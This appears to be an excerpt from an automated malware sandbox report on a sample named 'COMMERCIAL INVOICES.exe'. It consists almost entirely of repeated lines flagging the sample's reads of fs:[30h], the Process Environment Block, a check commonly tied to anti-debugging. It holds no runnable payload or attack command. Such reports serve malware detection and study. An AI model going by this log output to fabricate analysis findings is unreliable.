            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C4000 mov ecx, dword ptr fs:[00000030h]4_2_012C4000
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E2000 mov eax, dword ptr fs:[00000030h]4_2_012E2000
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E2000 mov eax, dword ptr fs:[00000030h]4_2_012E2000
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E2000 mov eax, dword ptr fs:[00000030h]4_2_012E2000
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E2000 mov eax, dword ptr fs:[00000030h]4_2_012E2000
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E2000 mov eax, dword ptr fs:[00000030h]4_2_012E2000
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E2000 mov eax, dword ptr fs:[00000030h]4_2_012E2000
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E2000 mov eax, dword ptr fs:[00000030h]4_2_012E2000
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E2000 mov eax, dword ptr fs:[00000030h]4_2_012E2000
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125E016 mov eax, dword ptr fs:[00000030h]4_2_0125E016
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125E016 mov eax, dword ptr fs:[00000030h]4_2_0125E016
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125E016 mov eax, dword ptr fs:[00000030h]4_2_0125E016
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125E016 mov eax, dword ptr fs:[00000030h]4_2_0125E016
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126C073 mov eax, dword ptr fs:[00000030h]4_2_0126C073
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01242050 mov eax, dword ptr fs:[00000030h]4_2_01242050
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C6050 mov eax, dword ptr fs:[00000030h]4_2_012C6050
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012380A0 mov eax, dword ptr fs:[00000030h]4_2_012380A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D80A8 mov eax, dword ptr fs:[00000030h]4_2_012D80A8
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013060B8 mov eax, dword ptr fs:[00000030h]4_2_013060B8
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013060B8 mov ecx, dword ptr fs:[00000030h]4_2_013060B8
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124208A mov eax, dword ptr fs:[00000030h]4_2_0124208A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0123A0E3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C60E0 mov eax, dword ptr fs:[00000030h]4_2_012C60E0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012480E9 mov eax, dword ptr fs:[00000030h]4_2_012480E9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123C0F0 mov eax, dword ptr fs:[00000030h]4_2_0123C0F0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012820F0 mov ecx, dword ptr fs:[00000030h]4_2_012820F0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C20DE mov eax, dword ptr fs:[00000030h]4_2_012C20DE
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01318324 mov eax, dword ptr fs:[00000030h]4_2_01318324
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01318324 mov ecx, dword ptr fs:[00000030h]4_2_01318324
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01318324 mov eax, dword ptr fs:[00000030h]4_2_01318324
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01318324 mov eax, dword ptr fs:[00000030h]4_2_01318324
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127A30B mov eax, dword ptr fs:[00000030h]4_2_0127A30B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127A30B mov eax, dword ptr fs:[00000030h]4_2_0127A30B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127A30B mov eax, dword ptr fs:[00000030h]4_2_0127A30B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123C310 mov ecx, dword ptr fs:[00000030h]4_2_0123C310
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01260310 mov ecx, dword ptr fs:[00000030h]4_2_01260310
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E437C mov eax, dword ptr fs:[00000030h]4_2_012E437C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130A352 mov eax, dword ptr fs:[00000030h]4_2_0130A352
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C2349 mov eax, dword ptr fs:[00000030h]4_2_012C2349
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C2349 mov eax, dword ptr fs:[00000030h]4_2_012C2349
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C2349 mov eax, dword ptr fs:[00000030h]4_2_012C2349
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C2349 mov eax, dword ptr fs:[00000030h]4_2_012C2349
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C2349 mov eax, dword ptr fs:[00000030h]4_2_012C2349
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C2349 mov eax, dword ptr fs:[00000030h]4_2_012C2349
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C2349 mov eax, dword ptr fs:[00000030h]4_2_012C2349
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C2349 mov eax, dword ptr fs:[00000030h]4_2_012C2349
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C2349 mov eax, dword ptr fs:[00000030h]4_2_012C2349
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C2349 mov eax, dword ptr fs:[00000030h]4_2_012C2349
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C2349 mov eax, dword ptr fs:[00000030h]4_2_012C2349
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C2349 mov eax, dword ptr fs:[00000030h]4_2_012C2349
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C2349 mov eax, dword ptr fs:[00000030h]4_2_012C2349
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C2349 mov eax, dword ptr fs:[00000030h]4_2_012C2349
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C2349 mov eax, dword ptr fs:[00000030h]4_2_012C2349
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C035C mov eax, dword ptr fs:[00000030h]4_2_012C035C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C035C mov eax, dword ptr fs:[00000030h]4_2_012C035C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C035C mov eax, dword ptr fs:[00000030h]4_2_012C035C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C035C mov ecx, dword ptr fs:[00000030h]4_2_012C035C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C035C mov eax, dword ptr fs:[00000030h]4_2_012C035C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C035C mov eax, dword ptr fs:[00000030h]4_2_012C035C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E8350 mov ecx, dword ptr fs:[00000030h]4_2_012E8350
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0131634F mov eax, dword ptr fs:[00000030h]4_2_0131634F
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126438F mov eax, dword ptr fs:[00000030h]4_2_0126438F
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126438F mov eax, dword ptr fs:[00000030h]4_2_0126438F
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123E388 mov eax, dword ptr fs:[00000030h]4_2_0123E388
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123E388 mov eax, dword ptr fs:[00000030h]4_2_0123E388
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123E388 mov eax, dword ptr fs:[00000030h]4_2_0123E388
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01238397 mov eax, dword ptr fs:[00000030h]4_2_01238397
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01238397 mov eax, dword ptr fs:[00000030h]4_2_01238397
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01238397 mov eax, dword ptr fs:[00000030h]4_2_01238397
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012503E9 mov eax, dword ptr fs:[00000030h]4_2_012503E9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012503E9 mov eax, dword ptr fs:[00000030h]4_2_012503E9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012503E9 mov eax, dword ptr fs:[00000030h]4_2_012503E9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012503E9 mov eax, dword ptr fs:[00000030h]4_2_012503E9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012503E9 mov eax, dword ptr fs:[00000030h]4_2_012503E9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012503E9 mov eax, dword ptr fs:[00000030h]4_2_012503E9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012503E9 mov eax, dword ptr fs:[00000030h]4_2_012503E9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012503E9 mov eax, dword ptr fs:[00000030h]4_2_012503E9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125E3F0 mov eax, dword ptr fs:[00000030h]4_2_0125E3F0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125E3F0 mov eax, dword ptr fs:[00000030h]4_2_0125E3F0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125E3F0 mov eax, dword ptr fs:[00000030h]4_2_0125E3F0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012763FF mov eax, dword ptr fs:[00000030h]4_2_012763FF
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012FC3CD mov eax, dword ptr fs:[00000030h]4_2_012FC3CD
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A3C0 mov eax, dword ptr fs:[00000030h]4_2_0124A3C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A3C0 mov eax, dword ptr fs:[00000030h]4_2_0124A3C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A3C0 mov eax, dword ptr fs:[00000030h]4_2_0124A3C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A3C0 mov eax, dword ptr fs:[00000030h]4_2_0124A3C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A3C0 mov eax, dword ptr fs:[00000030h]4_2_0124A3C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A3C0 mov eax, dword ptr fs:[00000030h]4_2_0124A3C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012483C0 mov eax, dword ptr fs:[00000030h]4_2_012483C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012483C0 mov eax, dword ptr fs:[00000030h]4_2_012483C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012483C0 mov eax, dword ptr fs:[00000030h]4_2_012483C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012483C0 mov eax, dword ptr fs:[00000030h]4_2_012483C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C63C0 mov eax, dword ptr fs:[00000030h]4_2_012C63C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EE3DB mov eax, dword ptr fs:[00000030h]4_2_012EE3DB
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EE3DB mov eax, dword ptr fs:[00000030h]4_2_012EE3DB
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EE3DB mov ecx, dword ptr fs:[00000030h]4_2_012EE3DB
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EE3DB mov eax, dword ptr fs:[00000030h]4_2_012EE3DB
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E43D4 mov eax, dword ptr fs:[00000030h]4_2_012E43D4
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E43D4 mov eax, dword ptr fs:[00000030h]4_2_012E43D4
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123823B mov eax, dword ptr fs:[00000030h]4_2_0123823B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01244260 mov eax, dword ptr fs:[00000030h]4_2_01244260
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01244260 mov eax, dword ptr fs:[00000030h]4_2_01244260
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01244260 mov eax, dword ptr fs:[00000030h]4_2_01244260
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123826B mov eax, dword ptr fs:[00000030h]4_2_0123826B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F0274 mov eax, dword ptr fs:[00000030h]4_2_012F0274
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F0274 mov eax, dword ptr fs:[00000030h]4_2_012F0274
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F0274 mov eax, dword ptr fs:[00000030h]4_2_012F0274
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F0274 mov eax, dword ptr fs:[00000030h]4_2_012F0274
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F0274 mov eax, dword ptr fs:[00000030h]4_2_012F0274
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F0274 mov eax, dword ptr fs:[00000030h]4_2_012F0274
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F0274 mov eax, dword ptr fs:[00000030h]4_2_012F0274
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F0274 mov eax, dword ptr fs:[00000030h]4_2_012F0274
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F0274 mov eax, dword ptr fs:[00000030h]4_2_012F0274
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F0274 mov eax, dword ptr fs:[00000030h]4_2_012F0274
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F0274 mov eax, dword ptr fs:[00000030h]4_2_012F0274
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F0274 mov eax, dword ptr fs:[00000030h]4_2_012F0274
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0131625D mov eax, dword ptr fs:[00000030h]4_2_0131625D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C8243 mov eax, dword ptr fs:[00000030h]4_2_012C8243
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C8243 mov ecx, dword ptr fs:[00000030h]4_2_012C8243
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123A250 mov eax, dword ptr fs:[00000030h]4_2_0123A250
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01246259 mov eax, dword ptr fs:[00000030h]4_2_01246259
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012FA250 mov eax, dword ptr fs:[00000030h]4_2_012FA250
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012FA250 mov eax, dword ptr fs:[00000030h]4_2_012FA250
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012502A0 mov eax, dword ptr fs:[00000030h]4_2_012502A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012502A0 mov eax, dword ptr fs:[00000030h]4_2_012502A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D62A0 mov eax, dword ptr fs:[00000030h]4_2_012D62A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D62A0 mov ecx, dword ptr fs:[00000030h]4_2_012D62A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D62A0 mov eax, dword ptr fs:[00000030h]4_2_012D62A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D62A0 mov eax, dword ptr fs:[00000030h]4_2_012D62A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D62A0 mov eax, dword ptr fs:[00000030h]4_2_012D62A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D62A0 mov eax, dword ptr fs:[00000030h]4_2_012D62A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E284 mov eax, dword ptr fs:[00000030h]4_2_0127E284
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E284 mov eax, dword ptr fs:[00000030h]4_2_0127E284
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C0283 mov eax, dword ptr fs:[00000030h]4_2_012C0283
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C0283 mov eax, dword ptr fs:[00000030h]4_2_012C0283
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C0283 mov eax, dword ptr fs:[00000030h]4_2_012C0283
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012502E1 mov eax, dword ptr fs:[00000030h]4_2_012502E1
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012502E1 mov eax, dword ptr fs:[00000030h]4_2_012502E1
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012502E1 mov eax, dword ptr fs:[00000030h]4_2_012502E1
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A2C3 mov eax, dword ptr fs:[00000030h]4_2_0124A2C3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A2C3 mov eax, dword ptr fs:[00000030h]4_2_0124A2C3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A2C3 mov eax, dword ptr fs:[00000030h]4_2_0124A2C3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A2C3 mov eax, dword ptr fs:[00000030h]4_2_0124A2C3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A2C3 mov eax, dword ptr fs:[00000030h]4_2_0124A2C3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013162D6 mov eax, dword ptr fs:[00000030h]4_2_013162D6
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250535 mov eax, dword ptr fs:[00000030h]4_2_01250535
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250535 mov eax, dword ptr fs:[00000030h]4_2_01250535
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250535 mov eax, dword ptr fs:[00000030h]4_2_01250535
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250535 mov eax, dword ptr fs:[00000030h]4_2_01250535
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250535 mov eax, dword ptr fs:[00000030h]4_2_01250535
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250535 mov eax, dword ptr fs:[00000030h]4_2_01250535
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E53E mov eax, dword ptr fs:[00000030h]4_2_0126E53E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E53E mov eax, dword ptr fs:[00000030h]4_2_0126E53E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E53E mov eax, dword ptr fs:[00000030h]4_2_0126E53E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E53E mov eax, dword ptr fs:[00000030h]4_2_0126E53E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E53E mov eax, dword ptr fs:[00000030h]4_2_0126E53E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D6500 mov eax, dword ptr fs:[00000030h]4_2_012D6500
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01314500 mov eax, dword ptr fs:[00000030h]4_2_01314500
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01314500 mov eax, dword ptr fs:[00000030h]4_2_01314500
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01314500 mov eax, dword ptr fs:[00000030h]4_2_01314500
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01314500 mov eax, dword ptr fs:[00000030h]4_2_01314500
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01314500 mov eax, dword ptr fs:[00000030h]4_2_01314500
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01314500 mov eax, dword ptr fs:[00000030h]4_2_01314500
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01314500 mov eax, dword ptr fs:[00000030h]4_2_01314500
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127656A mov eax, dword ptr fs:[00000030h]4_2_0127656A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127656A mov eax, dword ptr fs:[00000030h]4_2_0127656A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127656A mov eax, dword ptr fs:[00000030h]4_2_0127656A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01248550 mov eax, dword ptr fs:[00000030h]4_2_01248550
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01248550 mov eax, dword ptr fs:[00000030h]4_2_01248550
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C05A7 mov eax, dword ptr fs:[00000030h]4_2_012C05A7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C05A7 mov eax, dword ptr fs:[00000030h]4_2_012C05A7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C05A7 mov eax, dword ptr fs:[00000030h]4_2_012C05A7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012645B1 mov eax, dword ptr fs:[00000030h]4_2_012645B1
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012645B1 mov eax, dword ptr fs:[00000030h]4_2_012645B1
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01242582 mov eax, dword ptr fs:[00000030h]4_2_01242582
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01242582 mov ecx, dword ptr fs:[00000030h]4_2_01242582
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01274588 mov eax, dword ptr fs:[00000030h]4_2_01274588
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E59C mov eax, dword ptr fs:[00000030h]4_2_0127E59C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E5E7 mov eax, dword ptr fs:[00000030h]4_2_0126E5E7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E5E7 mov eax, dword ptr fs:[00000030h]4_2_0126E5E7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E5E7 mov eax, dword ptr fs:[00000030h]4_2_0126E5E7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E5E7 mov eax, dword ptr fs:[00000030h]4_2_0126E5E7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E5E7 mov eax, dword ptr fs:[00000030h]4_2_0126E5E7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E5E7 mov eax, dword ptr fs:[00000030h]4_2_0126E5E7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E5E7 mov eax, dword ptr fs:[00000030h]4_2_0126E5E7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E5E7 mov eax, dword ptr fs:[00000030h]4_2_0126E5E7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012425E0 mov eax, dword ptr fs:[00000030h]4_2_012425E0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127C5ED mov eax, dword ptr fs:[00000030h]4_2_0127C5ED
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127C5ED mov eax, dword ptr fs:[00000030h]4_2_0127C5ED
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E5CF mov eax, dword ptr fs:[00000030h]4_2_0127E5CF
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E5CF mov eax, dword ptr fs:[00000030h]4_2_0127E5CF
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012465D0 mov eax, dword ptr fs:[00000030h]4_2_012465D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127A5D0 mov eax, dword ptr fs:[00000030h]4_2_0127A5D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127A5D0 mov eax, dword ptr fs:[00000030h]4_2_0127A5D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123E420 mov eax, dword ptr fs:[00000030h]4_2_0123E420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123E420 mov eax, dword ptr fs:[00000030h]4_2_0123E420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123E420 mov eax, dword ptr fs:[00000030h]4_2_0123E420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123C427 mov eax, dword ptr fs:[00000030h]4_2_0123C427
